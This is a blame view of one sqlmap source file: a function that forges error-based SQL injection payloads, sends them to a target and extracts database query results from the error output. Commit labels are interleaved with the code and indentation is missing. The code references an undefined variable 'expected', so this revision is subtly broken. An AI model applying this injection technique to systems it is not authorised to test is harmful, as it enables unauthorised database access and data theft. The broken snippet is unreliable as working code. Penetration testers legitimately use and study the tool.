sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity
e24bff0497
sqlmap/lib/techniques/error/use.py

83 lines
3.0 KiB
Python
Raw Normal View History

code refactoring
2010-10-20 13:09:04 +04:00
#!/usr/bin/env python
"""
$Id$
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
import re
import time
from lib.core.agent import agent
from lib.core.common import getUnicode
from lib.core.common import randomInt
from lib.core.common import replaceNewlineTabs
from lib.core.common import safeStringFormat
from lib.core.convert import urlencode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.session import setError
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
from lib.utils.resume import resume
from lib.core.settings import ERROR_SPACE
from lib.core.settings import ERROR_EMPTY_CHAR
no more regex. web server independent.
2010-10-20 13:35:46 +04:00
from lib.core.settings import ERROR_START_CHAR
from lib.core.settings import ERROR_END_CHAR
code refactoring
2010-10-20 13:09:04 +04:00
def errorUse(expression, resumeValue=True):
"""
Retrieve the output of a SQL query taking advantage of an error SQL
injection vulnerability on the affected parameter.
"""
logic = conf.logic
randInt = randomInt(1)
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
nice refactoring
2010-10-20 13:46:57 +04:00
startLimiter = ""
endLimiter = ""
code refactoring
2010-10-20 13:09:04 +04:00
if resumeValue:
output = resume(expression, payload)
else:
output = None
if output and ( expected is None or ( expected == "int" and output.isdigit() ) ):
return output
if kb.dbmsDetected:
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
if kb.dbms == "MySQL":
nulledCastedField = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionUnescaped = unescaper.unescape(expressionReplaced)
nice refactoring
2010-10-20 13:46:57 +04:00
startLimiter = unescaper.unescape("'%s'" % ERROR_START_CHAR)
endLimiter = unescaper.unescape("'%s'" % ERROR_END_CHAR)
code refactoring
2010-10-20 13:09:04 +04:00
else:
expressionUnescaped = unescaper.unescape(expression)
debugMsg = "query: %s" % expressionUnescaped
logger.debug(debugMsg)
nice refactoring
2010-10-20 13:46:57 +04:00
forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
code refactoring
2010-10-20 13:09:04 +04:00
result = Request.queryPage(urlencode(forgedPayload), content=True)
no more regex. web server independent.
2010-10-20 13:35:46 +04:00
match = re.search('%s(?P<result>.+?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
code refactoring
2010-10-20 13:09:04 +04:00
if match:
output = match.group('result')
if output:
output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "")
if conf.verbose > 0:
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
logger.info(infoMsg)
return output
Reference in New Issue Copy Permalink